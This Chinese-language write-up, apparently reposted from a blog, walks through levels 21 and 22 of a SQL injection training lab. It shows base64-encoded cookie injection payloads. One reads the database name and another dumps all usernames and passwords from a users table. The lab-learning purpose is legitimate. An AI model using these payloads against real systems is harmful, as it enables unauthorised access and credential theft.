不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限!
第二十一关
我们输入用户名密码之后发现是这个样子的,和第20关很像,就是cookie的值变成了一堆字母数字,
这是对cookie的值进行了base64的处理,其他和20关一样
代理,抓包,,
当然要先确认cookie后面的构造,通过测试是单引号括号闭合‘),当然这个也要转码,
给大家一个在线加密解密网站
获取数据库名
-giao‘) union select 1,2,database()# 转义后 LWdpYW8nKSB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
最后获得用户名密码,中间步骤不再一一截图,里面的语句和第一关一样
这是语句 -admin‘) union select 1,2,group_concat(username,0x3a,password) from users#
这是base64转码 LWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodXNlcm5hbWUsMHgzYSxwYXNzd29yZCkgZnJvbSB1c2VycyM9
第二十二关
这一关还是输入用户名密码先试试,发现和21关一样
原文:https://www.cnblogs.com/escwq/p/12264076.html